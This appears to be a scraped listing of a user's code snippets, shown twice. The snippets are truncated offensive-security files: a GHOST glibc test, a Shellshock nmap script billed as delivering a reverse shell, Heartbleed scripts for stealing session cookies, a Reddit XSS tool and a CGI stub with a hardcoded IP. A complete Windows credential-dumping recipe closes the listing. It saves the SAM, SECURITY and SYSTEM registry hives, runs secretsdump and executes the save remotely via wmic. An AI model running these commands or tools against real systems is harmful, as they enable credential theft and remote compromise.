sh1n0b1

## CVE-2015-0235.c
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];

## SourceAnalyzer.php
<html>
<title>PHP Source Analyzer by Delicon</title>
<head>
<script language="JavaScript">
function mouseDown_Action(c_id) {
   var obj = document.getElementById(c_id);
   if (obj.style.visibility == 'hidden') {
      obj.style.visibility = 'visible';
      obj.style.position = 'static';
   } else {

## gist:ed44ae7316af7337e454
#!/bin/python

import sys
import socket
import time
import struct

if len(sys.argv)<2:
    print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
    quit()

## http-vuln-cve-2014-6271.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

description = [[
NSE script that delivers you a reverse shell using CVE-2014-6271.
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
<ip> -d

## dana-na.cgi
#!/usr/bin/perl -w

use CGI;
use Digest::MD5 qw(md5_hex);

$cgi = new CGI;
$SESSDIR = "/tmp/";
$sessfile = $cgi->cookie("diagsess");
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");

## a04c152139d85507cac88fcc4aaf9ca9
$sesshash{'ip'} = '68.227.245.145';
$sesshash{'user'} = 'admin';

## reddit.py
#!/usr/bin/env python
#Reddit XSS
#Author: Cheetz
import urllib2, sys
import logging, os, re, sys, urllib, string
from optparse import OptionParser
from urlparse import urlparse

class Lookup:
        def run(self,url):

## heartbleed-altered.py
#!/usr/bin/python

# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)

# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# The author disclaims copyright to this source code.

# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/

## ssltest.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select

## hashdump.reg
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
	#include <netdb.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <errno.h>
	#include <gnu/libc-version.h>
	#define CANARY "in_the_coal_mine"
	struct {
	char buffer[1024];
	char canary[sizeof(CANARY)];
	<html>
	<title>PHP Source Analyzer by Delicon</title>
	<head>
	<script language="JavaScript">
	function mouseDown_Action(c_id) {
	var obj = document.getElementById(c_id);
	if (obj.style.visibility == 'hidden') {
	obj.style.visibility = 'visible';
	obj.style.position = 'static';
	} else {
	#!/bin/python

	import sys
	import socket
	import time
	import struct

	if len(sys.argv)<2:
	print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
	quit()
	local http = require "http"
	local shortport = require "shortport"
	local stdnse = require "stdnse"
	local vulns = require "vulns"

	description = [[
	NSE script that delivers you a reverse shell using CVE-2014-6271.
	Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
	--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
	<ip> -d
	#!/usr/bin/perl -w

	use CGI;
	use Digest::MD5 qw(md5_hex);

	$cgi = new CGI;
	$SESSDIR = "/tmp/";
	$sessfile = $cgi->cookie("diagsess");
	$arg0 = $cgi->param("arg");
	$action = $cgi->param("action");
	$sesshash{'ip'} = '68.227.245.145';
	$sesshash{'user'} = 'admin';
	#!/usr/bin/env python
	#Reddit XSS
	#Author: Cheetz
	import urllib2, sys
	import logging, os, re, sys, urllib, string
	from optparse import OptionParser
	from urlparse import urlparse

	class Lookup:
	def run(self,url):
	#!/usr/bin/python

	# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
	# Michael Davis (mike.philip.davis@gmail.com)

	# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

	# The author disclaims copyright to this source code.

	# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/
	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
	# The author disclaims copyright to this source code.

	import sys
	import struct
	import socket
	import time
	import select
	reg.exe save hklm\sam c:\temp\sam.save
	reg.exe save hklm\security c:\temp\security.save
	reg.exe save hklm\system c:\temp\system.save
	secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

	#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

	#Do this remotely
	wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"